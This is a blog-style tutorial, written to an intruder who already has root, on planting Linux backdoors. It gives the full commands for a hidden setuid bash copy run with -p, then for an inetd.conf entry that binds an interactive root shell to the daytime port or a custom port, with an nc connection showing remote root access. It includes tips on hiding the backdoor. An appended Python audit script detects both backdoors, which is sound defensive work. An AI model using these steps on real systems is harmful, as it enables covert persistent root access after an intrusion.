Beware of SUID shell and inetd backdoors on CentOS: a detailed explanation

Time:2020-2-18

You are now root and want to leave a back door.


System environment:

dawg:~# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1. SUID shell

First, switch to root and run the following commands:

dawg:~# cp /bin/bash /.woot
dawg:~# chmod 4755 /.woot
dawg:~# ls -al /.woot
-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot

Of course, you can choose other, more inconspicuous names; I am sure you are sneaky and clever enough to come up with plenty of good ones. The leading dot in the file name is not required; it only hides the file from a plain directory listing (a name that starts with "." is hidden in any directory).

Now, as an ordinary user, let's try the backdoor:

fw@dawg:~$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
fw@dawg:~$ /.woot
.woot-2.05b$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
.woot-2.05b$

Why didn't that work?

Because bash 2 has a protective measure against being run setuid (it drops the elevated effective UID at startup), but this protection is not unbreakable:

.woot-2.05b$ /.woot -p
.woot-2.05b# id
uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)

The -p option gives a root shell. Here euid means the effective user ID (the uid is still 1000, but the effective uid is 0).

Note that when running this SUID shell as an ordinary user, you must use its full path.

A bit of background:

How to find files with the SUID bit set:

dawg:~# find / -perm +4000 -ls

Every file with the SUID bit set is listed. (The "+4000" form is the old GNU find syntax; current versions of find expect "-perm -4000" or "-perm /4000" for the same check.)

2. Remote backdoor: using /etc/inetd.conf

Edit the /etc/inetd.conf file with vi.

Original file:

#chargen  dgram   udp  wait    root  internal
#discard  stream  tcp  nowait  root  internal
#discard  dgram   udp  wait    root  internal
#daytime  stream  tcp  nowait  root  internal

Changed to:

#discard  stream  tcp  nowait  root  internal
#discard  dgram   udp  wait    root  internal
daytime   stream  tcp  nowait  root  /bin/bash  bash -i

Start inetd:

dawg:~# inetd

If inetd is already running, send it SIGHUP to force it to re-read its configuration:

dawg:~# ps -ef | grep inetd
root       362     1  0 Jul22 ?        00:00:00 /usr/sbin/inetd
root     13769 13643  0 17:51 pts/1    00:00:00 grep inetd
dawg:~# kill -HUP 362

Now we can connect to the daytime port (13) with nc:

C:\tools>
192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.77] 13 (daytime) open
bash: no job control in this shell
bash-2.05b#
bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
bash-2.05b# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

Tips:

We can also edit the /etc/services file and add a line such as:

woot  6666/tcp  # evil backdoor service

Then add the matching entry to /etc/inetd.conf:

woot  stream  tcp  nowait  root  /bin/bash  bash -i

The service can also be bound to a commonly used port so that it stands out less.
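From the defender's side, both backdoors described above leave simple traces: an inetd.conf entry whose server program is a shell, and a setuid binary that is hidden or sits outside the directories where packaged setuid programs live. The following audit helpers are an added example, not code from the original post; the two sample inputs are constructed to mirror the post, and the system-directory list and shell names are assumptions you may need to extend for your distribution.

```python
import os

# Shells that no legitimate inetd service would be configured to execute directly.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "csh", "tcsh"}
# Directories where distribution packages normally install setuid binaries (assumed list).
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/",
               "/usr/libexec/", "/usr/local/bin/", "/usr/local/sbin/")


def inetd_shell_services(conf_text):
    """(service, server, args) for active inetd.conf lines whose server is a shell.
    Columns: service socket-type proto wait/nowait user server-program [args...]
    Commented-out lines and 'internal' services (handled by inetd itself) are skipped."""
    hits = []
    for raw in conf_text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 6 or fields[5] == "internal":
            continue
        server, args = fields[5], fields[6:]
        if os.path.basename(server) in SHELL_NAMES:
            hits.append((fields[0], server, " ".join(args)))
    return hits


def suspicious_suid_files(find_ls_text):
    """Setuid paths from `find / -perm -4000 -ls` output that are hidden
    (name starts with '.') or live outside SYSTEM_DIRS.
    Columns: inode blocks mode links user group size month day time path"""
    flagged = []
    for raw in find_ls_text.splitlines():
        fields = raw.split()
        # the setuid bit is the 4th character of the mode string: 's' (or 'S' if not executable)
        if len(fields) < 11 or len(fields[2]) < 10 or fields[2][3] not in "sS":
            continue
        path = " ".join(fields[10:])
        if os.path.basename(path).startswith(".") or not path.startswith(SYSTEM_DIRS):
            flagged.append(path)
    return flagged


# Constructed samples mirroring the post (not captured from a real host).
SAMPLE_INETD_CONF = """\
#daytime stream tcp nowait root internal
daytime  stream tcp nowait root /bin/bash bash -i
telnet   stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd
woot     stream tcp nowait root /bin/bash bash -i
"""
SAMPLE_FIND_LS = """\
     2 688 -rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot
    53  24 -rwsr-xr-x 1 root root  24312 Mar 19  2003 /bin/su
    90  32 -rwxr-xr-x 1 root root  31232 Mar 19  2003 /usr/bin/top
   311  16 -rwsr-xr-x 1 root root  15872 Jul 24 17:20 /tmp/helper
"""
```

On a real host, feed the functions the contents of /etc/inetd.conf and the output of `find / -perm -4000 -ls`; the sample data flags the daytime and woot entries and the /.woot and /tmp/helper files while leaving /bin/su alone.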

Editor's remark: in fact, the root password in the /etc/shadow file is the most secure of all!